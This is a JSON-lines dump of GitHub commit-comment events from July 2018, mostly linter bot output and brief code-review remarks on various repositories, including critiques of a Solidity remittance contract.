{"id":"7969436325","type":"CommitCommentEvent","actor":{"login":"danihazler"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29717429,"position":null,"line":null,"path":null,"commit_id":"a7f4728c61b539863b91752bfe21924eb81f3039","created_at":"2018-07-16T09:04:40Z","updated_at":"2018-07-16T09:04:40Z","author_association":"NONE","body":"if I remove \", { Component } \"  line 1, from ListContacts.js. I get an error."}},"created_at":"2018-07-16T09:04:40Z"}
{"id":"7969436390","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717430,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:41Z","updated_at":"2018-07-16T09:04:41Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/emoji (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/emoji\" in any of:"}},"created_at":"2018-07-16T09:04:41Z"}
{"id":"7969436411","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717431,"position":8,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:41Z","updated_at":"2018-07-16T09:04:41Z","author_association":"NONE","body":"unparam: \"net/http\" imported but not used"}},"created_at":"2018-07-16T09:04:41Z"}
{"id":"7969436429","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717432,"position":9,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:41Z","updated_at":"2018-07-16T09:04:41Z","author_association":"NONE","body":"unparam: \"net/url\" imported but not used"}},"created_at":"2018-07-16T09:04:41Z"}
{"id":"7969436451","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717433,"position":10,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:42Z","updated_at":"2018-07-16T09:04:42Z","author_association":"NONE","body":"unparam: \"os\" imported but not used"}},"created_at":"2018-07-16T09:04:42Z"}
{"id":"7969436476","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717434,"position":4,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:42Z","updated_at":"2018-07-16T09:04:42Z","author_association":"NONE","body":"unparam: \"errors\" imported but not used"}},"created_at":"2018-07-16T09:04:42Z"}
{"id":"7969436504","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717435,"position":8,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:42Z","updated_at":"2018-07-16T09:04:42Z","author_association":"NONE","body":"unparam: \"net/http\" imported but not used"}},"created_at":"2018-07-16T09:04:42Z"}
{"id":"7969436537","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717436,"position":9,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:42Z","updated_at":"2018-07-16T09:04:42Z","author_association":"NONE","body":"unparam: \"net/url\" imported but not used"}},"created_at":"2018-07-16T09:04:42Z"}
{"id":"7969436557","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717437,"position":10,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:43Z","updated_at":"2018-07-16T09:04:43Z","author_association":"NONE","body":"unparam: \"os\" imported but not used"}},"created_at":"2018-07-16T09:04:43Z"}
{"id":"7969436583","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717438,"position":4,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:43Z","updated_at":"2018-07-16T09:04:43Z","author_association":"NONE","body":"unparam: \"errors\" imported but not used"}},"created_at":"2018-07-16T09:04:43Z"}
{"id":"7969436618","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717439,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"1f3bbe8d5ee9512af968feb8beb30f9eea4ff25d","created_at":"2018-07-16T09:04:43Z","updated_at":"2018-07-16T09:04:43Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/emoji (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/emoji\" in any of:"}},"created_at":"2018-07-16T09:04:43Z"}
{"id":"7969440504","type":"CommitCommentEvent","actor":{"login":"PasticheDev"},"repo":{"name":"PasticheDev/Scripts"},"payload":{"comment":{"id":29717457,"position":2,"line":2,"path":"README.md","commit_id":"bd0664c455a4300d6abd6b12c568206306be9932","created_at":"2018-07-16T09:05:34Z","updated_at":"2018-07-16T09:05:34Z","author_association":"OWNER","body":"My personal library of scripts I gather during my learning process."}},"created_at":"2018-07-16T09:05:34Z"}
{"id":"7969445338","type":"CommitCommentEvent","actor":{"login":"mp184"},"repo":{"name":"yennguyen196/TabLayoutVer2"},"payload":{"comment":{"id":29717469,"position":5,"line":5,"path":"app/src/main/res/values/dimens.xml","commit_id":"237508ce5cf07ab6c96a2c2227d413ce79bae0ae","created_at":"2018-07-16T09:06:38Z","updated_at":"2018-07-16T09:06:38Z","author_association":"NONE","body":"Cuối file xuống dòng"}},"created_at":"2018-07-16T09:06:38Z"}
{"id":"7969445657","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29717471,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T09:06:42Z","updated_at":"2018-07-16T09:06:42Z","author_association":"MEMBER","body":"English Skill: 100%"}},"created_at":"2018-07-16T09:06:42Z"}
{"id":"7969446824","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-elemental-bannerblock"},"payload":{"comment":{"id":29717474,"position":null,"line":null,"path":null,"commit_id":"48bf83f478d2a77c73a5267626588e301709e6c8","created_at":"2018-07-16T09:06:59Z","updated_at":"2018-07-16T09:06:59Z","author_association":"MEMBER","body":"TIL"}},"created_at":"2018-07-16T09:06:59Z"}
{"id":"7969456086","type":"CommitCommentEvent","actor":{"login":"timojuez"},"repo":{"name":"nils-werner/deda"},"payload":{"comment":{"id":29717487,"position":null,"line":null,"path":null,"commit_id":"8e04915ee1a52d2fd77c9edff2059b3d83a9a293","created_at":"2018-07-16T09:09:04Z","updated_at":"2018-07-16T09:09:04Z","author_association":"NONE","body":"Unauthorised author and license change."}},"created_at":"2018-07-16T09:09:04Z"}
{"id":"7969456740","type":"CommitCommentEvent","actor":{"login":"FHeilmann"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29717492,"position":null,"line":null,"path":null,"commit_id":"e35f926ca63c704c55f4824226cb91a6d38fcfa6","created_at":"2018-07-16T09:09:13Z","updated_at":"2018-07-16T09:09:13Z","author_association":"NONE","body":"Would it be possible to also implement a custom resume handling? \r\n\r\ne.g. if the toolhead is moved to an idle position and X and Y axis are disabled, a resume handler would home X and Y axii and move back to the previous position?"}},"created_at":"2018-07-16T09:09:13Z"}
{"id":"7969456941","type":"CommitCommentEvent","actor":{"login":"ErdeGao11"},"repo":{"name":"ErdeGao11/erde"},"payload":{"comment":{"id":29717493,"position":1,"line":1,"path":"README.md","commit_id":"bdcf286f5fa970cc08534c0a662f8515d2cb6cec","created_at":"2018-07-16T09:09:16Z","updated_at":"2018-07-16T09:09:16Z","author_association":"OWNER","body":"# erde\r\n\r\n> Pardon my French"}},"created_at":"2018-07-16T09:09:16Z"}
{"id":"7969457899","type":"CommitCommentEvent","actor":{"login":"matthiaskrgr"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29717495,"position":null,"line":null,"path":null,"commit_id":"e46c499f5a6c552672ce246e0be8f14c9febcc51","created_at":"2018-07-16T09:09:29Z","updated_at":"2018-07-16T09:09:29Z","author_association":"COLLABORATOR","body":"68a91b73da09f17b0bc8064ef5260f169e6afc2b added around 10 minutes to travis execution time.\r\n\r\nI'm wondering if there is a way to the addon in a multi threaded way as well.\r\n````\r\nfind . | grep \"./lib.*cpp.dump\" | xargs -P 4  python addons/naming.py --private-member-variable='m[A-Z].*'\r\n````\r\ndid not seem to work though :/"}},"created_at":"2018-07-16T09:09:29Z"}
{"id":"7969458159","type":"CommitCommentEvent","actor":{"login":"yueye729"},"repo":{"name":"yueye729/mywork"},"payload":{"comment":{"id":29717496,"position":null,"line":null,"path":null,"commit_id":"b4c5362ff95f5ac24b5ad9f1e68d43e883dcf5e1","created_at":"2018-07-16T09:09:32Z","updated_at":"2018-07-16T09:09:32Z","author_association":"OWNER","body":"好东西"}},"created_at":"2018-07-16T09:09:32Z"}
{"id":"7969461233","type":"CommitCommentEvent","actor":{"login":"mkh9901"},"repo":{"name":"mkh9901/Study"},"payload":{"comment":{"id":29717500,"position":null,"line":null,"path":null,"commit_id":"a531936a62f2aa1dd2ef443a49dc24e2eb45b951","created_at":"2018-07-16T09:10:11Z","updated_at":"2018-07-16T09:10:11Z","author_association":"OWNER","body":"* 공부 한 내용\r\n-이더리움의 Get을 이용해서 사설 네트워크망 구축 / 사설 제네시스 블럭 생성\r\n-마이닝\r\n-계좌 간 이더리움 전송\r\n-소프트포그 / 하드포크 개념\r\n-가스 / 이더 개념\r\n-Mist 사용\r\n\r\n*주의 사항\r\n-30303포트 연결 \r\n-balance 값  :  1,000,000,000,000,000,000 = 1 ether \r\n\r\n"}},"created_at":"2018-07-16T09:10:11Z"}
{"id":"7969462890","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29717503,"position":6,"line":5,"path":"colors.scheme.xml","commit_id":"d63768c13cead8abf33579b0d3be3e4c85fc4e71","created_at":"2018-07-16T09:10:30Z","updated_at":"2018-07-16T09:10:30Z","author_association":"NONE","body":"таких файлов не должно быть в комитах, это служебные файлы и их надо добавить в .gitignore (папку с настройками редактора)"}},"created_at":"2018-07-16T09:10:30Z"}
{"id":"7969463466","type":"CommitCommentEvent","actor":{"login":"RajatKJain"},"repo":{"name":"RajatKJain/helloworld"},"payload":{"comment":{"id":29717505,"position":3,"line":3,"path":"README.md","commit_id":"9713bcfb5bed8afec4971f48666018aeada64a16","created_at":"2018-07-16T09:10:37Z","updated_at":"2018-07-16T09:10:37Z","author_association":"OWNER","body":"Please commit and send notification"}},"created_at":"2018-07-16T09:10:37Z"}
{"id":"7969466568","type":"CommitCommentEvent","actor":{"login":"falexwolf"},"repo":{"name":"theislab/scanpy"},"payload":{"comment":{"id":29717514,"position":135,"line":126,"path":"scanpy/tools/rank_genes_groups.py","commit_id":"ad488601cd444bd5bb329a9ada16dcc0ac5ae232","created_at":"2018-07-16T09:11:19Z","updated_at":"2018-07-16T09:11:19Z","author_association":"MEMBER","body":"Yes... you're right... this is stuff that a Hiwi did at some point... I'll remove all of it..."}},"created_at":"2018-07-16T09:11:19Z"}
{"id":"7969468217","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29717519,"position":49,"line":4704,"path":"share/instruments/instruments.xml","commit_id":"3adc0a40f4fcda24b64fd5b37094c87c96f7f155","created_at":"2018-07-16T09:11:42Z","updated_at":"2018-07-16T09:11:42Z","author_association":"CONTRIBUTOR","body":"Better duplicate it rather then replace "}},"created_at":"2018-07-16T09:11:42Z"}
{"id":"7969469103","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29717521,"position":null,"line":null,"path":null,"commit_id":"7d3ea9d17cfa57e2791c174a5559325aa89588cc","created_at":"2018-07-16T09:11:53Z","updated_at":"2018-07-16T09:11:53Z","author_association":"OWNER","body":"P645 courier data source completed!"}},"created_at":"2018-07-16T09:11:53Z"}
{"id":"7969472774","type":"CommitCommentEvent","actor":{"login":"GeorgeMits"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29717527,"position":null,"line":null,"path":null,"commit_id":"fdd46f29d39e23c00cdd4313985aa29b3f175ce7","created_at":"2018-07-16T09:12:40Z","updated_at":"2018-07-16T09:12:40Z","author_association":"NONE","body":"Hello,\r\n\r\nThe suggestion of vishram08 to create a custom map, helped me realize that the problem was that on CustomerDto, the property return type was MembeshipType. When I changed it to MembershipTypeDto everything worked."}},"created_at":"2018-07-16T09:12:40Z"}
{"id":"7969474684","type":"CommitCommentEvent","actor":{"login":"nils-werner"},"repo":{"name":"nils-werner/deda"},"payload":{"comment":{"id":29717529,"position":null,"line":null,"path":null,"commit_id":"8e04915ee1a52d2fd77c9edff2059b3d83a9a293","created_at":"2018-07-16T09:13:04Z","updated_at":"2018-07-16T09:13:04Z","author_association":"OWNER","body":"What do you mean? There was no setup.py before this."}},"created_at":"2018-07-16T09:13:04Z"}
{"id":"7969477142","type":"CommitCommentEvent","actor":{"login":"chegel"},"repo":{"name":"chegel/OpenCV-3.4.0-windows-x64"},"payload":{"comment":{"id":29717535,"position":null,"line":null,"path":null,"commit_id":"aadfb36a2d11876860aa71267ae7d7943b2873aa","created_at":"2018-07-16T09:13:34Z","updated_at":"2018-07-16T09:13:34Z","author_association":"OWNER","body":"Try adding DLLs to Windows Path.\r\n"}},"created_at":"2018-07-16T09:13:34Z"}
{"id":"7969478188","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717536,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d6a656b10725fae227f9b959485872a898fb5652","created_at":"2018-07-16T09:13:46Z","updated_at":"2018-07-16T09:13:46Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/emoji (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/emoji\" in any of:"}},"created_at":"2018-07-16T09:13:46Z"}
{"id":"7969478215","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717537,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d6a656b10725fae227f9b959485872a898fb5652","created_at":"2018-07-16T09:13:47Z","updated_at":"2018-07-16T09:13:47Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/emoji (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/emoji\" in any of:"}},"created_at":"2018-07-16T09:13:47Z"}
{"id":"7969478242","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717538,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d6a656b10725fae227f9b959485872a898fb5652","created_at":"2018-07-16T09:13:47Z","updated_at":"2018-07-16T09:13:47Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/emoji\" in any of:"}},"created_at":"2018-07-16T09:13:47Z"}
{"id":"7969478261","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29717539,"position":17,"line":null,"path":"pkg/command/emoji/emoji.go","commit_id":"d6a656b10725fae227f9b959485872a898fb5652","created_at":"2018-07-16T09:13:47Z","updated_at":"2018-07-16T09:13:47Z","author_association":"NONE","body":"golint: exported function NewEmojiCommand should have comment or be unexported"}},"created_at":"2018-07-16T09:13:47Z"}
{"id":"7969479162","type":"CommitCommentEvent","actor":{"login":"RajatKJain"},"repo":{"name":"RajatKJain/helloworld"},"payload":{"comment":{"id":29717541,"position":null,"line":null,"path":null,"commit_id":"9713bcfb5bed8afec4971f48666018aeada64a16","created_at":"2018-07-16T09:13:59Z","updated_at":"2018-07-16T09:13:59Z","author_association":"OWNER","body":"commit this change"}},"created_at":"2018-07-16T09:13:59Z"}
{"id":"7969479254","type":"CommitCommentEvent","actor":{"login":"Piruzzolo"},"repo":{"name":"yvan-burrie/Genie-Reverse"},"payload":{"comment":{"id":29717544,"position":80,"line":80,"path":"src/Engine/DrawSystem.hpp","commit_id":"2558c3c3e79d74abd6882ce8fa8c526109c733a8","created_at":"2018-07-16T09:14:00Z","updated_at":"2018-07-16T09:14:00Z","author_association":"NONE","body":"Maybe these functions have an HRESULT as argument?"}},"created_at":"2018-07-16T09:14:00Z"}
{"id":"7969482603","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717556,"position":15,"line":8,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:14:42Z","updated_at":"2018-07-16T09:14:42Z","author_association":"NONE","body":"I see no logic using `payee`. It is purely for information purposes, so it has no place in storage. \r\nIt could have a place in an event, but because the payee wants USD and not Ether, I think it has no place in events either."}},"created_at":"2018-07-16T09:14:42Z"}
{"id":"7969486865","type":"CommitCommentEvent","actor":{"login":"pad52"},"repo":{"name":"espressif/esp-idf"},"payload":{"comment":{"id":29717566,"position":15,"line":117,"path":"examples/bluetooth/a2dp_sink/main/main.c","commit_id":"21af1d73399d5f70ca7799ef90a233e0d0e7e52c","created_at":"2018-07-16T09:15:35Z","updated_at":"2018-07-16T09:15:35Z","author_association":"NONE","body":"I think that there is a mistake here: It need to be BT_SSP_INCLUDED and not BT_SPP_INCLUDED."}},"created_at":"2018-07-16T09:15:35Z"}
{"id":"7969494006","type":"CommitCommentEvent","actor":{"login":"MichaelBengtsson"},"repo":{"name":"krokedil/klarna-checkout-for-woocommerce"},"payload":{"comment":{"id":29717585,"position":null,"line":null,"path":null,"commit_id":"aa81da101ca59e8f4bcd240bfe946038db8810e3","created_at":"2018-07-16T09:16:58Z","updated_at":"2018-07-16T09:16:58Z","author_association":"CONTRIBUTOR","body":"Fixes #28"}},"created_at":"2018-07-16T09:16:58Z"}
{"id":"7969497498","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717591,"position":62,"line":45,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:17:41Z","updated_at":"2018-07-16T09:17:41Z","author_association":"NONE","body":"The passwords given here are public knowledge as soon the transaction is transmitted to the network. \r\nSo to call `processPayment` with `_passwordPayee` all you have to do is collect the password from the tx that set it up. This is not a challenge, this is an invitation to theft."}},"created_at":"2018-07-16T09:17:41Z"}
{"id":"7969498945","type":"CommitCommentEvent","actor":{"login":"itsvolodya"},"repo":{"name":"effective-light/discorddelete"},"payload":{"comment":{"id":29717594,"position":null,"line":null,"path":null,"commit_id":"c74ec17181760586ef0bc4f3b7faa8454add7367","created_at":"2018-07-16T09:17:59Z","updated_at":"2018-07-16T09:17:59Z","author_association":"NONE","body":"And it can't do deeper than 100 messages. Changing limits turns out with errors."}},"created_at":"2018-07-16T09:17:59Z"}
{"id":"7969499032","type":"CommitCommentEvent","actor":{"login":"paparoup"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29717595,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T09:18:00Z","updated_at":"2018-07-16T09:18:00Z","author_association":"NONE","body":"It's ok , probably i didn't understand correctly.\r\nI don't have Red Hat content in my entitlement so i can safely proceed with the workaround\r\nThanks once again"}},"created_at":"2018-07-16T09:18:00Z"}
{"id":"7969509329","type":"CommitCommentEvent","actor":{"login":"vijayganeshd"},"repo":{"name":"vijayganeshd/ruby-getting-started"},"payload":{"comment":{"id":29717607,"position":5,"line":4,"path":"app/views/layouts/application.html.erb","commit_id":"f9229875937a91709097f49c6ec7bc56dbc8e477","created_at":"2018-07-16T09:20:00Z","updated_at":"2018-07-16T09:20:00Z","author_association":"OWNER","body":"to be changed"}},"created_at":"2018-07-16T09:20:00Z"}
{"id":"7969511059","type":"CommitCommentEvent","actor":{"login":"vijayganeshd"},"repo":{"name":"vijayganeshd/ruby-getting-started"},"payload":{"comment":{"id":29717610,"position":null,"line":null,"path":null,"commit_id":"f9229875937a91709097f49c6ec7bc56dbc8e477","created_at":"2018-07-16T09:20:19Z","updated_at":"2018-07-16T09:20:19Z","author_association":"OWNER","body":"Leave the comment"}},"created_at":"2018-07-16T09:20:19Z"}
{"id":"7969512776","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717614,"position":17,"line":17,"path":"contracts/Remittance.sol","commit_id":"f040eba728124d6baf71db5a0e88b0f4f78175c7","created_at":"2018-07-16T09:20:39Z","updated_at":"2018-07-16T09:20:39Z","author_association":"NONE","body":"What you are testing here is nothing special. You are testing whether the person crafting the transaction is able to put the `amount` value in the function arguments same as the value passed. This is not \"proving\" that money was sent.\r\n\r\nWhen you hand cash to the cashier, does the cashier look at what they have in the hand or do they compare what they have in the hand with the number you said out loud?"}},"created_at":"2018-07-16T09:20:39Z"}
{"id":"7969516396","type":"CommitCommentEvent","actor":{"login":"wenshiwei"},"repo":{"name":"geek-ai/MAgent"},"payload":{"comment":{"id":29717621,"position":2,"line":99,"path":"doc/get_started.md","commit_id":"13ac2a9206183f357c42444df633ed7990dca216","created_at":"2018-07-16T09:21:27Z","updated_at":"2018-07-16T09:21:27Z","author_association":"NONE","body":"You should open the index.html in browser first,then exute ' ./render'"}},"created_at":"2018-07-16T09:21:27Z"}
{"id":"7969517507","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717623,"position":69,"line":50,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:21:41Z","updated_at":"2018-07-16T09:21:41Z","author_association":"NONE","body":"Why would anyone quote a fee other than 0?"}},"created_at":"2018-07-16T09:21:41Z"}
{"id":"7969521406","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717629,"position":65,"line":46,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:22:30Z","updated_at":"2018-07-16T09:22:30Z","author_association":"NONE","body":"A contract counts time in seconds. So to talk \"days\", you will have to do some conversion. Why not send numbers already in seconds?"}},"created_at":"2018-07-16T09:22:30Z"}
{"id":"7969524615","type":"CommitCommentEvent","actor":{"login":"loedelman"},"repo":{"name":"loedelman/iscmesprop1"},"payload":{"comment":{"id":29717638,"position":2,"line":2,"path":"README.md","commit_id":"f64a67f052aed5049510d30e6eff3f9de1cd6043","created_at":"2018-07-16T09:23:07Z","updated_at":"2018-07-16T09:23:07Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-16T09:23:07Z"}
{"id":"7969553189","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717698,"position":10,"line":10,"path":"src/main/java/abc/Group.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:28:55Z","updated_at":"2018-07-16T09:28:55Z","author_association":"COLLABORATOR","body":"For each entities create EducationEntity- abstract class. Put there name and all logic to read from console.\r\nIn this case will be Group extends EducationEntity {….}"}},"created_at":"2018-07-16T09:28:55Z"}
{"id":"7969554928","type":"CommitCommentEvent","actor":{"login":"e-n-l"},"repo":{"name":"Bounties-Network/BountiesFactory"},"payload":{"comment":{"id":29717701,"position":null,"line":null,"path":null,"commit_id":"0dcdbf7f31045926983f4c2824fb363f291091f3","created_at":"2018-07-16T09:29:17Z","updated_at":"2018-07-16T09:29:17Z","author_association":"NONE","body":"Just Slacked you about this."}},"created_at":"2018-07-16T09:29:17Z"}
{"id":"7969555973","type":"CommitCommentEvent","actor":{"login":"longzhen520"},"repo":{"name":"longzhen520/STTC-code"},"payload":{"comment":{"id":29717703,"position":2,"line":2,"path":"README.md","commit_id":"ae49f09833736a357cf69bdf2de77d16f4f17eee","created_at":"2018-07-16T09:29:31Z","updated_at":"2018-07-16T09:29:31Z","author_association":"OWNER","body":"------------------------------------------------------\r\nYou can try just run the\r\n\r\ndemo_test.m for color image completion\r\n\r\n------------------------------------------------------\r\nFor setting up, we can add path by the following sentence.\r\n\r\naddpath('mylib');\r\n\r\n------------------------------------------------------\r\n\r\n We also provide a PPT for quickly understanding our algorithm."}},"created_at":"2018-07-16T09:29:31Z"}
{"id":"7969556933","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717708,"position":18,"line":11,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:29:43Z","updated_at":"2018-07-16T09:29:43Z","author_association":"NONE","body":"Same for `passwordExchange`, it has no logic associated to it."}},"created_at":"2018-07-16T09:29:43Z"}
{"id":"7969557953","type":"CommitCommentEvent","actor":{"login":"timojuez"},"repo":{"name":"nils-werner/deda"},"payload":{"comment":{"id":29717710,"position":32,"line":32,"path":"setup.py","commit_id":"8e04915ee1a52d2fd77c9edff2059b3d83a9a293","created_at":"2018-07-16T09:29:56Z","updated_at":"2018-07-16T09:29:56Z","author_association":"NONE","body":"I have not ever released the software under MIT."}},"created_at":"2018-07-16T09:29:56Z"}
{"id":"7969563506","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717721,"position":44,"line":44,"path":"src/main/java/abc/Group.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:31:08Z","updated_at":"2018-07-16T09:31:08Z","author_association":"COLLABORATOR","body":"methods should have have as action. In this case findFiveBestStudents. There is no need to write where (it will be well know from type of entity that you will use to call this code). I.e. group.findFiveBestStudents"}},"created_at":"2018-07-16T09:31:08Z"}
{"id":"7969565861","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717731,"position":5,"line":9,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:31:37Z","updated_at":"2018-07-16T09:31:37Z","author_association":"NONE","body":"Why do you no longer use `[0]`?"}},"created_at":"2018-07-16T09:31:37Z"}
{"id":"7969566949","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717733,"position":13,"line":10,"path":"src/main/java/abc/ListUnitTaskResults.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:31:50Z","updated_at":"2018-07-16T09:31:50Z","author_association":"COLLABORATOR","body":"Gather in one line"}},"created_at":"2018-07-16T09:31:50Z"}
{"id":"7969569049","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717736,"position":13,"line":10,"path":"src/main/java/abc/ListUnitTaskResults.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:32:13Z","updated_at":"2018-07-16T09:32:13Z","author_association":"COLLABORATOR","body":"The same for code from below"}},"created_at":"2018-07-16T09:32:13Z"}
{"id":"7969573937","type":"CommitCommentEvent","actor":{"login":"zhfwch"},"repo":{"name":"zhfwch/qmf-cashier"},"payload":{"comment":{"id":29717749,"position":null,"line":null,"path":null,"commit_id":"a50e8d60071760d7ce4a2bde8eecf8afe309bafa","created_at":"2018-07-16T09:33:13Z","updated_at":"2018-07-16T09:33:13Z","author_association":"OWNER","body":"2.7.7"}},"created_at":"2018-07-16T09:33:13Z"}
{"id":"7969575265","type":"CommitCommentEvent","actor":{"login":"YcherishY"},"repo":{"name":"YcherishY/linux"},"payload":{"comment":{"id":29717756,"position":null,"line":null,"path":null,"commit_id":"e503c4cd28d0a6175506abf30a95c391736390d8","created_at":"2018-07-16T09:33:30Z","updated_at":"2018-07-16T09:33:30Z","author_association":"OWNER","body":"图片"}},"created_at":"2018-07-16T09:33:30Z"}
